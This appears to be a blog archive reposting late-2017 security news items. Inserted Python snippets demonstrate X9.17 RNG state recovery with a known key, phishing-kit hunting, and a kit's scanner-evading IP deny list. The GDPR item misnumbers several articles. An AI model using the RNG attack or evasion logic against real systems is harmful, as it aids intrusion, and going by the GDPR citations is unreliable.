Tuesday, October 31, 2017
This Inexpensive Front Pocket Wallet Gives You Easy Access to a Ton of Cards and Cash
I like small, front pocket wallets. I also like to carry a lot of cards, plus some cash. These two desires are usually in conflict, but the Strapo wallet (currently on Kickstarter) can satisfy both.
The front of Strapo features two quick-access slots for your most used cards, and the back has a sturdy elastic strap to hold cash, keys, and even coins without fear of them falling out. The star of the show here though is the top, which opens up to hold the rest of your cards. They say it can hold six, but I crammed 10 into the top of my demo unit. I definitely wouldn’t recommend more than that, but I’m a credit card hoarder, so I think most of you should be fine.
But how do you get those cards out, if they’re tucked all the way inside the wallet? With the strap(o), of course. Just pull on the little elastic tab at the top of the wallet, and the entire pile of cards pops out for you to grab.
For a limited time, you can preorder a Strapo for $23, or two for $39 (with some higher reward tiers available as well), with expected delivery in December.
from Lifehacker http://ift.tt/2iM1n8t
Equifax is facing a towering pile of class-action lawsuits
Remember how deposed Equifax CEO Rick Smith got trotted around Capitol Hill to have his wrist metaphorically slapped by several congressional committees following what security journalist Brian Krebs so memorably referred to as the “dumpster fire” of a breach?
…and remember how we told you not to hold your breath with regard to real reform in the data brokerage industry? After all, in spite of congressional members saying that the company’s pre- and post-breach actions/inactions “smelled really bad,” there was zero talk of serving Equifax execs with subpoenas.
Well, subpoena time may have gotten yet another class-action lawsuit closer. If Washington isn’t going to slap some payback out of Equifax, then hopefully one or more of the 70+ class action lawsuits filed since the breach was disclosed on 7 September 2017 will do some good.
The law firm of Stritmatter Kessler Whelan just filed another one: a national class action complaint (PDF) against Equifax in the US District Court of the Western District of Washington, in Seattle. The case is still in its early stages, but the law firm says it has signed three named plaintiffs.
A woman who believes she’s one of the 140 million victims says her identity has been stolen 15 times since the breach.
Katie Van Fleet, of Seattle, says she’s received letters from stores including Kohl’s, Macy’s, Old Navy and Home Depot, thanking her for her credit applications. Nope, didn’t apply for any such, Van Fleet says. She and her Stritmatter attorney, Catherine Fleming, believe that her personal data was stolen during the Equifax hack.
It’s a fine kettle of fish to be forced to deal with when you’re trying to buy a house, as is Van Fleet. What’s particularly galling is that neither she nor any of us have a choice about credit reporting agencies gobbling up our data, she says… and then disgorging it upon the internet:
I feel very helpless. I didn’t sign up to Equifax so I feel all of that stuff has been taken and I’m left here trying to sweep up the pieces and protect myself and protect my credit.
The Seattle suit is alleging that, among other things, Equifax…
- “Willfully, knowingly, callously, recklessly, and negligently” let hackers get at the personally identifying information (PII) of more than 100 million US citizens, green card holders and business customers without their prior express consent, and “without regard” for what would be done with the data.
- “Exploited the harm” done to the victims with an incident response site that offered the “deceptive promise” of one year of free credit monitoring by its wholly owned subsidiary, TrustedID, in exchange for users waiving their right to pursue legal action.
- Knew, or should have known, about the breach when it happened or soon thereafter, but three company execs cashed in almost $2 million worth of shares weeks before they told shareholders or affected consumers and business owners.
The suit alleges that Equifax forced people and businesses to give up the right to sue it, though the company, after being given a good bit of grief over the issue, updated its policy on 11 September to state that:
…enrolling in the free credit file monitoring and identity theft protection products that we are offering as part of this cybersecurity incident does not prohibit consumers from taking legal action.
The suit alleges that it’s “unfair, deceptive and otherwise wrongful conduct under state and federal law” for Equifax to “[create] the illusion that Plaintiffs and other consumers may benefit” from the cash cow that is TrustedID.
Stritmatter has another term for Equifax’s TrustedID credit monitoring: it’s calling it “profiteering.”
No one should feel safe about this breach after one year. Typically, bad actors hold onto Personally Identifiable Information for a period of time with the intent of escaping the breach victim’s attention.
Indeed, bad actors can hold onto our PII for years: long enough for the Equifax breach, and the company’s jaw-dropping sloppiness before and after the breach, to fade from the headlines and from the collectively short attention span of Capitol Hill; long enough for some of us to get tired of the inconveniences of credit freezes and free up our credit so we can carry on with life as we take out mortgages, buy cars, apply for credit lines and so on.
If you’re thinking about joining a class action suit against Equifax, there are a few things to keep in mind.
For one, as pointed out by Consumer Reports, if you join a class action alleging serious financial, physical, or other harm, you give up your right to sue the company on your own.
Keep in mind that proving an individual’s loss is going to be tough. Another proposed class-action lawsuit filed in Oregon accuses the company of negligence by failing to take appropriate measures to protect consumer data. It estimates billions of dollars in losses.
How much loss has any individual suffered? Well, that amounts to the grand total of $19.95 – the amount one of the Oregon plaintiffs paid for a third-party credit monitoring service after the breach was announced, according to the complaint.
Can anybody put a dollar sign on the amount of work and aggravation that somebody like Van Fleet has gone through to clean up her credit report and the onslaught of identity theft she’s suffered?
At this point, it’s up to the lawyers, and the courts, to determine.
from Naked Security http://ift.tt/2A43atW
How to Find a Stud in Your Wall With Just a Magnet
If you’re doing some home renovation work or hanging something up, you’ll need to know where the studs in your walls are. But you don’t need a fancy stud finder device—a magnet will do just fine.
Most screws are made of steel, which magnets are attracted to, and screws are commonly used in home construction. So, the studs in your walls probably have some screws in them. In this video, YouTuber Jaime S. shows you how you can find those screws—and thus find the stud—with a cheap magnet. Just move your magnet along the wall until the magnet gets drawn in and connects. Now you roughly know where the stud is, as well as where you shouldn’t drill or hammer directly (because there’s a screw right there).
Jaime uses a magnetic pick-up stick to do this, which is designed to extend and pick up screws or other loose metal building materials, but you can also use a typical rare-earth magnet if you already have one of those. The advantage of using the pick-up stick, however, is that you can extend the stick after placing the magnet on a stud and use it as a plumb bob. Now you can easily find the stud below the magnet as well.
Inexpensive Stud Finder Using a Magnet! | YouTube
from Lifehacker http://ift.tt/2iOmY0g
Attack on Old ANSI Random Number Generator
Almost 20 years ago, I wrote a paper that pointed to a potential flaw in the ANSI X9.17 RNG standard. Now, new research has found that the flaw exists in some implementations of the RNG standard.
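For readers who want to see the mechanics: the X9.17 generator derives each output from a block cipher keyed with a supposedly secret key K, and the flaw bites when implementations hardcode or leak K. Here's a toy Python model (a keyed hash stands in for the real DES/AES block cipher; all values and names are illustrative, not from the research) showing why a known K is fatal: one observed output plus a guessable timestamp yields the internal state and every future output.

```python
import hashlib

def E(key, block):
    # Toy 8-byte "block cipher" standing in for DES/AES in X9.17.
    return hashlib.sha256(key + block).digest()[:8]

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def x917_step(key, state, timestamp):
    # One X9.17 iteration: I = E_K(T); output R = E_K(I xor V);
    # next state V' = E_K(R xor I).
    i = E(key, timestamp)
    r = E(key, xor(i, state))
    return r, E(key, xor(r, i))

# Generator side: two outputs from a secret seed.
key, seed = b"hardcode", b"seedseed"
r1, v1 = x917_step(key, seed, b"time0001")
r2, _ = x917_step(key, v1, b"time0002")

# Attacker side: knows key (hardcoded) and timestamps, observes only r1.
i1 = E(key, b"time0001")
recovered_state = E(key, xor(r1, i1))   # equals v1
predicted_r2, _ = x917_step(key, recovered_state, b"time0002")
assert predicted_r2 == r2  # the next "random" output is fully predicted
```

With a secret key the construction is fine; the whole attack surface is that single keying assumption.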
Here's the research paper, the website -- complete with cute logo -- for the attack, and Matthew Green's excellent blog post on the research.
from Schneier on Security http://ift.tt/2iikBP7
FireEye releases open source managed password cracking tool
FireEye has released GoCrack, an open source tool for managing password cracking tasks across multiple machines.
“Simply deploy a GoCrack server along with a worker on every GPU/CPU capable machine and the system will automatically distribute tasks across those GPU/CPU machines,” Christopher Schmitt, a senior vulnerability engineer at FireEye, explained.
GoCrack and its source code have been made available on GitHub.
Users can build it from source, or with the help of docker containers that build the necessary components for a successful install.
“We’re shipping with Dockerfile’s [sic] to help jumpstart users with GoCrack. The server component can run on any Linux server with Docker installed. Users with NVIDIA GPUs can use NVIDIA Docker to run the worker in a container with full access to the GPUs,” Schmitt added.
Using GoCrack
The tool is expected to be of great help to red teams, which need to do things like test password effectiveness, develop better methods to securely store passwords, audit current password requirements, crack passwords on exfil archives, and so on.
Users can create, view, and manage tasks through a simple web-based user interface:
“Keeping in mind the sensitivity of passwords, GoCrack includes an entitlement-based system that prevents users from accessing task data unless they are the original creator or they grant additional users to the task. Modifications to a task, viewing of cracked passwords, downloading a task file, and other sensitive actions are logged and available for auditing by administrators,” Schmitt says.
“Engine files (files used by the cracking engine) such as Dictionaries, Mangling Rules, etc. can be uploaded as ‘Shared’, which allows other users to use them in task yet do not grant them the ability to download or edit. This allows for sensitive dictionaries to be used without enabling their contents to be viewed.”
GoCrack tasks won’t function until engine files are uploaded.
“GoCrack is shipping with support for hashcat v3.6+, requires no external database server (via a flat file), and includes support for both LDAP and database backed authentication,” Schmitt notes.
They plan on adding support for MySQL and PostgreSQL database engines for larger deployments, the ability to manage and edit files in the UI, automatic task expiration, and greater configuration of the hashcat engine.
from Help Net Security http://ift.tt/2z1IiDr
Researchers analyze 3,200 unique phishing kits
Most phishing sites are quickly detected and access to them is blocked, but no matter how fast the “takedown” happens, the number of victims is still large enough to make the phishers’ effort worthwhile.
That’s because the required effort is often minimal: access to compromised sites can be relatively cheaply bought (or phished), access to email accounts used to send out phishing mail is easy (new or compromised through phishing), and phishing kits are pretty easy to create and, generally, shared or sold at a bargain.
“To stand up a new phishing site, attackers first clone the legitimate site they want to spoof, then change the login form to point to a simple PHP script. The script collects credentials and either emails them to the attacker or logs them to a text file,” Jordan Wright, R&D Engineer at Duo Security, explains.
“Once the contents of the phishing site are created, they are bundled into a .zip file for reuse across multiple servers and phishing campaigns.”
These phishing kits are, in this form, easy to upload to a hacked site, where the files are unzipped into a directory. With the phishing page ready, the attackers can start sending out phishing emails pointing to it.
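Because kits are so often unzipped in place with the archive left behind, one way to hunt for them is to request each enclosing directory of a reported phishing URL with “.zip” appended. A rough Python sketch of that guessing step (the function name and heuristic are illustrative, not Duo's actual code):

```python
import urllib.parse

def candidate_kit_urls(phishing_url):
    """Guess where a leftover kit archive might live for a reported
    phishing URL: each enclosing directory, with ".zip" appended."""
    parts = urllib.parse.urlsplit(phishing_url)
    path = parts.path
    # Drop the page itself (e.g. index.php) if the URL names a file.
    last = path.rsplit("/", 1)[-1]
    if "." in last:
        path = path[: -len(last)]
    path = path.rstrip("/")
    candidates = []
    while path:
        candidates.append(f"{parts.scheme}://{parts.netloc}{path}.zip")
        path = path.rsplit("/", 1)[0]
    return candidates

urls = candidate_kit_urls("http://example.com/wp-content/login/index.php")
# Each candidate would then be fetched and checked for a ZIP signature.
```

A scanner would fetch each candidate and look for the `PK` magic bytes before bothering to download the whole file.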
Analyzing phishing kits
Wright and his colleagues set out to analyze phishing kits left behind by lazy phishers on compromised websites/servers, so they trawled through sites hosting phishing URLs that have been submitted to Phishtank and OpenPhish.
After a month, they found 3,200 unique ones, and their analysis revealed that there is some kit reuse, even though it’s not as extensive as expected given that the whole point of phishing kits is to make it easy for attackers to reuse code across phishing sites.
They also found that only 11 percent of the compromised sites hosted multiple unique phishing kits, which means that either the same actor ran multiple campaigns simultaneously, or that multiple actors have compromised the same host.
The latter possibility should not come as a surprise, as many of the phishing kits they analyzed came with (hidden) backdoors.
“While we can’t attribute these particular kits we studied to a marketplace, there have been other smaller studies that indicate phishing kits can be bought for as little as $2 – $10,” Wright told Help Net Security.
Regardless of how these kits are obtained – be it sold, given away, or traded – attackers are obviously using them as an opportunity to reap the benefits of a compromised host without doing any of the work, he noted.
“The most common backdoor we came across when searching through our data set was access to the host. However, there have been reports of backdoors that use heavily obfuscated code to send harvested credentials to a separate attacker’s email address. These are harder to detect at scale since this obfuscation can vary across kits and would require more close analysis, which we consider a good next step for future work.”
Who’s creating and who’s using these kits?
The analyzed phishing kits are made to emulate most popular service providers, including email providers, social networks, financial services, and more.
“The surprising finding to us wasn’t that these service providers are being used, but rather that we could see clear ties between the email addresses for particular actors and multiple phishing kits spoofing different services. So you may have an actor who can be seen as connected to both a phishing kit spoofing an email provider as well as a phishing kit spoofing a social network,” Wright says.
He also pointed out that one of the most useful things we can learn from analyzing phishing kits is where credentials are being sent.
“By tracking email addresses found in phishing kits, we can correlate actors to specific campaigns and even specific kits. Not only can we see where credentials are sent, but we also see where credentials claim to be sent from. Creators of phishing kits commonly use the ‘From’ header like a signing card, letting us find multiple kits created by the same author.”
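A first pass at mining those addresses can be a simple pattern match over a kit's source (a sketch; real kits sometimes obfuscate the address, so this only catches the unobfuscated majority, and the sample PHP below is invented for illustration):

```python
import re

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")

def exfil_addresses(kit_source):
    # Every email-like string in the kit; in practice these show up in
    # mail() calls and forged "From:" headers.
    return sorted(set(EMAIL_RE.findall(kit_source)))

sample_php = '''
$to = "drops@example.net";
$headers = "From: kitauthor@example.org";
mail($to, "new login", $msg, $headers);
'''
found = exfil_addresses(sample_php)
```

Clustering kits by these addresses is what lets researchers tie one actor to multiple campaigns.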
The rise of HTTPS phishing pages
Three of the top 10 paths in the researchers’ dataset indicate that phishing sites are hosted on compromised WordPress instances, but sites using other content management systems are also targeted:
“Attackers looking to compromise unpatched, out-of-date systems frequently target widely-used content management systems. This is why it’s critical to keep such software up-to-date,” the researchers noted.
Another interesting finding is that over 16% of the recorded samples were served over HTTPS.
“This doesn’t indicate anything wrong with HTTPS, but security professionals will now need to adjust their recommendations for spotting phishing sites and reconsider how much trust is placed on the ‘secure’ indicator in the browser,” they noted.
Finally, many of the analyzed phishing kits come with a .htaccess file that blocks connections based on HTTP request attributes, and on the list of blocked IP ranges are those belonging to threat intelligence services like Abuse.ch, Phishtank, and Netcraft. The goal, of course, is to keep the phishing URLs working as long as possible.
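The effect of such a .htaccess file is simple to model. Here's a minimal sketch of the blocking logic in Python (the deny ranges are illustrative documentation addresses, not taken from any real kit):

```python
import ipaddress

# Illustrative deny list of the kind found in kit .htaccess files:
# ranges associated with crawlers and threat-intel scanners.
DENY_RANGES = [
    ipaddress.ip_network(n) for n in ("192.0.2.0/24", "198.51.100.0/24")
]

def is_blocked(visitor_ip):
    # Return True if the visitor falls inside any denied range,
    # i.e. the kit would serve them a 403 instead of the phishing page.
    addr = ipaddress.ip_address(visitor_ip)
    return any(addr in net for net in DENY_RANGES)

assert is_blocked("192.0.2.77")
assert not is_blocked("203.0.113.5")
```

The same file typically also filters on User-Agent strings, turning away anything that identifies itself as a known crawler.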
from Help Net Security http://ift.tt/2iOn9sg
London Heathrow Airport’s security laid bare by one lost USB stick
If someone set out to invent a risky way to transport important data around, it’s hard to imagine they’d better the USB flash stick for calamitous efficiency.
They’re cheap enough to feel disposable, store large numbers of files, and despite years of mishaps barely any are sold with encryption security.
They’re also incredibly popular – which is why in 2017 we’re still writing about cases like the USB stick found in a west London street that turned out to contain 2.5GB of unprotected files detailing many of the anti-terrorism procedures and systems used to protect one of the world’s busiest airports.
This included: the route taken by the Queen, politicians and dignitaries when using the airport’s secure departure suite; radio codes used to indicate hijackings; details of maintenance and escape tunnels and CCTV locations; a timetable of police patrols; information of security ID cards; and details of the surveillance system used to monitor runways and the airport perimeter.
The only reason we know any of this is that the man who picked up the stick decided to report the discovery to a national newspaper, prompting the airport to launch a “very, very urgent” investigation.
Superficially, this resembles a good news story, a lucky escape that could have been so much worse.
Heathrow will ask the same questions as countless organisations before it: who copied the data and why? Did they have permission? Why wasn’t the stick secured?
The optimistic scenario is that someone unwisely decided to move a few files around and lost the USB stick in an act of carelessness. A more pessimistic possibility is that someone stole the data to order or to sell, which implies troubling things about network data security at Britain’s biggest airport.
The nature of the leaked information shows that USB stick incidents aren’t merely embarrassing, they can be extremely serious.
The lesson might be that in an era when employees can use more secure cloud storage, USB sticks should simply be banned. This has been tried, most notably by the US Department of Defense in 2008.
Mandating that sticks must be encrypted is another option, but this comes with the drawback that drivers are needed for every platform the drive might be plugged into (i.e. Mac and Linux machines as well as Windows).
Using sticks in this way also means organisations must invest in a provisioning system capable of tracking individual drives, resetting passwords, and remotely wiping data.
Even then, there’s still the small matter of making the sticks resistant to the more advanced cryptographic and physical tampering attacks anticipated by many compliance regimes – for storage, this is governed by the US government’s FIPS 140 levels 1-4. This involves a lot of testing and doesn’t come cheap.
We haven’t even mentioned the fact that USB sticks have a bad habit of picking up malware on their travels.
But let’s not fall into the trap of assuming that because USB sticks are somewhere between an expensive hassle and an outright grade one security risk, they can be quickly pensioned off.
Like it or not, they are inside every organisation by the bucket-load and won’t go away any time soon. As long as there are USB ports on computers to plug them into, they will be a problem.
From the fateful day the first USB sticks were plugged into computers by delighted employees in the late 1990s, securing them has been – at best – about containment. If only we’d known then what we know now.
from Naked Security http://ift.tt/2xE3JZJ
Troll gets 5 years for framing brother-in-law as terrorist and paedophile
A troll who launched what police called a “despicable” online smear campaign against his former brother-in-law, casting him as a paedophile and a would-be bomber, has been sentenced to more than five years in jail.
The Independent reports that 26-year-old Shohidul Islam, of Bradford, in the UK, “fell to pieces” when he couldn’t scrape together the £30,000 needed to bring his wife – Fahmida Parveen Shuba – and son over from Bangladesh.
It had been an arranged marriage. The couple wed in 2010, but she stayed in Bangladesh. Judge Rebecca Poulet QC last week told the court that Islam’s ex-wife had been “unhappy and afraid” of him at the time. By 2016, their relationship was over.
But Islam was not, evidently, through with his ex-wife or her family.
Acting out of revenge, Islam set up fake social media profiles in the name of Mohammed Razaul Karim – his ex-wife’s brother. Islam used those fake profiles to falsely paint Karim as an Islamic State supporter, somebody who was plotting bomb attacks, and as a child predator.
Islam used his brother-in-law’s photos to set up the fake accounts on Twitter, Facebook and YouTube. Then, he used the accounts to publish praise for previous terror attacks in the UK and to show support for the Islamic State.
Islam also used the imposter accounts to publish names and addresses of British soldiers, in an apparent call for others to target them in terror attacks. Posing as Karim’s uncle, he also filed a false report about Karim supposedly planning to detonate a “microwave bomb” at a primary school in Canning Town, east London.
According to the News & Star, Islam also framed Karim as a paedophile by creating a video using the fake social media profile on YouTube. The video was reportedly titled “Must watch child abuser, stay away from him” and included an image of Karim.
Prosecutor Mark Weekes told the court that the video alleged that Karim had been convicted of child abuse in his “home country”, in 2001 and suggested that he targets children online, has been arrested several times for child sex offenses and should be deported from the UK.
Weekes:
Needless to say, the allegation is entirely untrue.
Islam also made “pseudo indecent images of children” and sent them to Karim’s family. He also created a profile on the porn website X Videos and posted material to it in the name of Karim and his wife.
When police arrested Islam at a job centre in January 2016, they found a copy of the notorious Anarchist Cookbook on his mobile phone. First published in 1971, the book contains, amongst other things, instructions on making bombs and other weapons.
Islam initially denied the charges, but he changed his plea to guilty four days into his trial. He admitted to two counts of reckless encouragement of terrorism, possession of material useful to a terrorist, making a bomb hoax and making indecent images.
He was sentenced to five years and eight months jail time. Separate charges of making indecent images will be kept on file. He was also given a restraining order against further contact with Karim and his family.
The judge said that Karim, the target of the “wicked campaign”, was completely innocent but could have faced “dire consequences” had he come to the attention of authorities.
from Naked Security http://ift.tt/2hpQtSv
The clock is ticking on GDPR: Is your business ready?
Despite having almost two years to prepare for the General Data Protection Regulation (GDPR), many companies across the globe that are directly affected by the new law have done little, if anything, to avoid the hefty fines for non-compliance. In fact, businesses that fail to comply with the new standards for data collection and privacy by the May 2018 deadline could face fines of up to 4 percent of their annual revenue or 20 million euros, whichever is higher.
A big reason for the lack of preparedness is a misunderstanding of what businesses will have to do to comply in the first place. While the legislation comes from the EU, businesses don’t have to be based or even have a point of presence in the EU to face hefty fines. Any business, regardless of where it’s based, that has customers in the EU or collects the private, personally identifiable information (PII) of EU residents is held to the same standards.
Who will be most affected by GDPR?
The fact of the matter is that there are very few businesses that contribute to the global economy that this new regulation won’t touch. Whether you are a small e-retailer that sells niche products to a select few customers in the EU or a global behemoth on the scale of Amazon, you’ll need to cross-check your existing policies against the GDPR.
This is the biggest point of confusion for most businesses, as the GDPR doesn’t necessarily speak to data sovereignty so much as a business’ behavior and efficacy in providing the best protections. It emphasizes a point that many security experts have been harping on for years: data protection is an ongoing battle, not a matter of installing solutions once and expecting your problems to be resolved.
To drive this point home, Article 35 of the GDPR makes it mandatory for certain businesses to boost their manpower to assure defenses against data breaches are constantly being tested and bulked up.
Any organization collecting a subject’s genetic data, health information, racial or ethnic origin, or even religion will need to appoint an officer who can act as a dedicated point of contact for authorities monitoring compliance. This can’t just be any member of IT who’s read up on the latest compliance standards, as Articles 36 and 37 explain in depth just who meets the qualifications for these roles – generally, career enforcers with a history of dealing with authorities – as well as their responsibilities within the company.
What are the main sticking points?
Along with allocating manpower that will specifically be tasked with vetting these details to assure compliance, there are a few key points of the legislation that businesses will need to zero in on as a starting point. There are more than 91 articles within the GDPR spread across 11 chapters, making it a hefty document for IT to parse through.
Articles 23 and 30 are the areas of the legislation that should look the most familiar to teams already implementing data privacy protocols. Many of the measures here are relatively baseline in the context of the current cybersecurity climate, putting into law many of the practices that most businesses would already have needed to implement to succeed in a global market. These include deploying gateways to inspect web traffic that might be accessing or transmitting an organization’s customer data, along with encryption that follows the latest security protocols most internet traffic adheres to – Transport Layer Security (TLS), for instance.
The GDPR also goes to great lengths to give customers more control of their PII, especially information that gets automatically processed by services they do business with. Articles 17 and 18 dictate the “right to erasure,” for instance, under which subjects can request that a business scrub their PII from its data stores under certain extenuating circumstances, as well as the “right to portability,” which allows subjects to transfer their PII between independent service providers with greater ease.
The driving factor here is to give customers greater choice in the services they take advantage of, rather than binding them to contracts that might leave their PII vulnerable to a data breach.
Data breaches specifically are discussed in Articles 31 and 32. The former holds businesses to a 72-hour deadline to alert customers who were subject to a personal data breach once the company uncovers the compromising incident. Article 32 takes this a step further by requiring data controllers waste no time in notifying compromised subjects, or else they could face immediate penalties and have a weakened defense should litigation take businesses to EU courts.
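For teams wiring that deadline into incident-response tooling, the arithmetic is trivial but worth automating. A sketch (assuming discovery timestamps are stored timezone-aware; the function name is illustrative):

```python
from datetime import datetime, timedelta, timezone

def notification_deadline(discovered_at):
    # Article 31 gives controllers 72 hours from becoming aware of a
    # personal data breach to send notification.
    return discovered_at + timedelta(hours=72)

discovered = datetime(2018, 5, 25, 9, 0, tzinfo=timezone.utc)
deadline = notification_deadline(discovered)  # three days later, 09:00 UTC
```

Storing timestamps in UTC avoids the off-by-hours mistakes that daylight-saving transitions would otherwise introduce into the 72-hour window.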
Article 79 is the guideline that all members of an organization need to keep top-of-mind, as it details the penalties for non-compliance; specifically, what kinds of offenses warrant the intimidating 4-percent-of-revenue penalty mentioned above.
The good news for many businesses that have been dragging their feet is that a lot of the protocols that the GDPR makes law are already roundly considered best practice for any business taking part in the digital economy. Despite this, the GDPR protections are more wide-ranging than any preceding measures taken on a multi-national scale, so businesses need to be vigilant in cross-checking their existing security infrastructure against the GDPR to avoid penalties that no business can easily afford to stomach.
from Help Net Security http://ift.tt/2z65xyr
Oracle releases emergency Oracle Identity Manager patch
Oracle has issued an out-of-cycle patch that plugs a critical vulnerability (CVE-2017-10151) affecting Oracle Identity Manager, its widely used enterprise identity management system that is part of the company’s Fusion Middleware offering.
“Due to the severity of this vulnerability, Oracle strongly recommends that customers apply the updates provided by this Security Alert without delay,” the company said.
The vulnerability has been assigned a CVSS v3 base score of 10.0, and can result in complete compromise of Oracle Identity Manager via an unauthenticated network attack. It is easily exploitable, and a successful attack requires no human interaction.
Supported affected versions of the product are: 11.1.1.7, 11.1.1.9, 11.1.2.1.0, 11.1.2.2.0, 11.1.2.3.0, and 12.2.1.3.0.
“Product releases that are not under Premier Support or Extended Support are not tested for the presence of vulnerabilities addressed by this Security Alert. However, it is likely that earlier versions of affected releases are also affected by these vulnerabilities,” Oracle said, and advised customers to upgrade to supported versions.
No additional specific details about the flaw were shared, nor was the identity of the person(s) who discovered it, or any word on whether it is being actively exploited in the wild.
The October 2017 Oracle Critical Patch Update provided 40 new security fixes for Oracle Fusion Middleware. The next Oracle CPU is scheduled for 16 January 2018.
from Help Net Security http://ift.tt/2hpwfIB
Would you let Amazon unlock your door?
Amazon recently announced the launch of the Amazon Key, allowing the Amazon delivery person to open your door in order to place your package inside, where presumably it will be safe from theft, the weather, roaming wolf packs, bears, and general mishap.
Not all the commentary about this service (and associated camera, lock, etc.) has been positive. In fact, some has been rather negative or at least satirical.
Yes, of course there are concerns over security, privacy, and whether it’s really a good idea, generally, to let a corporation have access to your house. But the adoption rate for this technology isn’t really the story here. We should certainly be careful about allowing a company to share control over our front door, although there’s no reason to think this particular technology is any less secure than any other smart door lock, or that Amazon has anything nefarious in mind.
What matters here is that this is yet another salvo in the escalating war to win your home; a war that Amazon is currently winning, at least in volume of devices. This matters not just to consumers, consumer advocates, and B-to-C businesses, but also to enterprise businesses, service providers, governments, and frankly anyone who uses the Internet.
While right now there’s a relatively clear line between work and home, that line is rapidly disappearing. Employers and employees alike are starting to expect far more seamless linkage between the availability of systems and data at work and the availability of the same services at home (and in the car, too).
Remember when BYOD was a thing? When people actually debated whether employees would be able to use their own phones, tablets, and laptops on the corporate network? While for some highly secure environments that’s still not an option, for most it’s simply a fact of life.
And as homes get smarter and smarter, the pressure to see the home as a logical extension of the work network grows. We’re not just talking about setting up a VPN from your laptop, either. As more and more devices in the home connect, the attack surface of your corporate network starts to expand at an accelerated, uncontrolled rate. As a result, whoever builds, owns, and manages the central hub around which the smart home is built will matter – a lot – because their capacity to manage those devices, oversee access to them, and look for signs of attack will become central to how organizations manage risk.
In the end, things like the Amazon Key aren’t about controlling access to the door; they’re about controlling access to the entire smart home. It’s not a point solution; it’s part of a grand strategy to become the de facto technology around which the smart home of the next decade is built, and that smart home is going to be part of your corporate network, whether you like it or not.
A lot is riding on the security of this technology, and how willing the builders of smart homes, and smart home technology, are going to be to work with others to make that technology resilient to attack – attacks that will mount in severity over time. As smart homes become an extension of corporate networks (in the same way that smartphones already have), they will become the target of significant attack, up to and including nation-state sponsored attacks trying to penetrate enterprise networks.
If we can’t make this all work together, then the delivery guy opening the door won’t be the only person you have to worry about having more access than you would like.
from Help Net Security http://ift.tt/2gNSWoZ
Most organizations and consumers believe there is a need for IoT security regulation
90% of consumers lack confidence in the security of Internet of Things (IoT) devices, and more than two-thirds of consumers and almost 80% of organizations support governments getting involved in setting IoT security regulations, according to Gemalto.
“It’s clear that both consumers and businesses have serious concerns around IoT security and little confidence that IoT service providers and device manufacturers will be able to protect IoT devices and more importantly the integrity of the data created, stored and transmitted by these devices,” said Jason Hart, CTO, Data Protection at Gemalto. “With legislation like GDPR showing that governments are beginning to recognize the threats and long-lasting damage cyber-attacks can have on everyday lives, they now need to step up when it comes to IoT security. Until there is confidence in IoT amongst businesses and consumers, it won’t see mainstream adoption.”
The current state of play in IoT security
Consumers’ main fear (cited by two thirds of respondents) is hackers taking control of their device. In fact, this was more of a concern than their data being leaked (60%) and hackers accessing their personal information (54%). Despite more than half (54%) of consumers owning an IoT device (on average two), just 14% believe that they are extremely knowledgeable when it comes to the security of these devices, showing education is needed among both consumers and businesses.
In terms of the level of investment in security, the survey found that IoT device manufacturers and service providers spend just 11% of their total IoT budget on securing their IoT devices. The study found that these companies do recognize the importance of protecting devices and the data they generate or transfer with 50% of companies adopting a security by design approach.
Two-thirds (67%) of organizations report encryption as their main method of securing IoT assets, with 62% encrypting the data as soon as it reaches their IoT device and 59% encrypting it as it leaves the device. Ninety-two percent of companies also see an increase in sales or product usage after implementing IoT security measures.
Support for IoT security regulations gains traction
According to the survey, businesses are in favor of regulations that make it clear who is responsible for securing IoT devices and data at each stage of their journey (61%) and the implications of non-compliance (55%). In fact, almost every organization (96%) and consumer (90%) is looking for government-enforced IoT security regulation.
Lack of end-to-end capabilities leading to partnerships
Encouragingly, businesses are realizing that they need support in understanding IoT technology and are turning to partners to help, with cloud service providers (52%) and IoT service providers (50%) the favored options. When asked why, the top reason was a lack of expertise and skills (47%), followed by help in facilitating and speeding up their IoT deployment (46%).
While these partnerships may be benefiting businesses in adopting IoT, organizations admitted they don’t have complete control over the data that IoT products or services collect as it moves from partner to partner, potentially leaving it unprotected.
“The lack of knowledge among both the business and consumer worlds is quite worrying and it’s leading to gaps in the IoT ecosystem that hackers will exploit,” Hart continues. “Within this ecosystem, there are four groups involved – consumers, manufacturers, cloud service providers and third parties – all of which have a responsibility to protect the data. ‘Security by design’ is the most effective approach to mitigate against a breach. Furthermore, IoT devices are a portal to the wider network and failing to protect them is like leaving your door wide open for hackers to walk in. Until both sides increase their knowledge of how to protect themselves and adopt industry standard approaches, IoT will continue to be a treasure trove of opportunity for hackers.”
from Help Net Security http://ift.tt/2xDdlnv
Monday, October 30, 2017
Higher education CIOs expect business model change due to digital transformation
Higher education CIOs recognize that key organizational priorities are enrollment and student success, but fail to show innovation with regard to the top technologies required to differentiate themselves and win, according to a survey from Gartner. Yet, 59 percent of respondents think there will be significant business model change due to digital transformation.
Gartner’s 2018 CIO Agenda Survey gathered data from 3,160 CIO respondents in 98 countries and across major industries, including 247 higher education CIOs.
Higher education CIOs ranked digital business/digital transformation as the fifth most strategic business priority. However, when it comes to the top technology areas these institutions are investing in to differentiate themselves, digitalization/digital marketing ranks only eighth amongst higher education respondents, compared to second across all industries.
“This may be because higher education is among the least digitized industries,” said Jan-Martin Lowendahl, vice president and distinguished analyst at Gartner. “The average higher education institution has a large backlog of digital enablement before it can even think about digital transformation.”
Nevertheless, CIOs in the sector need to start bridging the digital divide. “Considering that higher education is, in principle, an ‘information’ industry with huge digital potential compared to other industries, digitalization needs to become a top priority,” Lowendahl said.
Top business objectives
A third of respondents cite enrollment as their top business priority, making it the clear leader. The growing need to ensure academic quality by competing for the best and the brightest explains the second business priority, student success (22 percent). Enrollment and student success are both related to growth/market share, but only 14 percent of the respondents explicitly mention this as a top business objective, putting it in joint third place, alongside retention.
Top tech to win
In response to the question ‘which technology area do you think is most important to helping your business differentiate and win or is most crucial to achieving your organization’s mission?’ BI/analytics was a clear No. 1 with higher education sector CIOs. That enterprise resource planning (ERP) is the second most mentioned technology is more surprising, as higher education institutions, in general, have not had a good track record in using ERP to re-engineer the institutions’ operations and decision making. Rather, they “pave the cow paths” – in the words of one CIO – resulting in costly customization and little improvement.
Third-ranked customer relationship management (CRM) clearly supports enrollment and retention business objectives while fourth-ranked learning management systems (LMS) is similarly aligned with business priorities such as student experience and success.
Top new tech spending
The higher education list of “top tech areas for new spending” has no clear winner. Cyber/information security ranks first with 18 percent, but is followed closely by ERP with 16 percent and a cluster of other priorities that don’t mirror the “top tech to win” list.
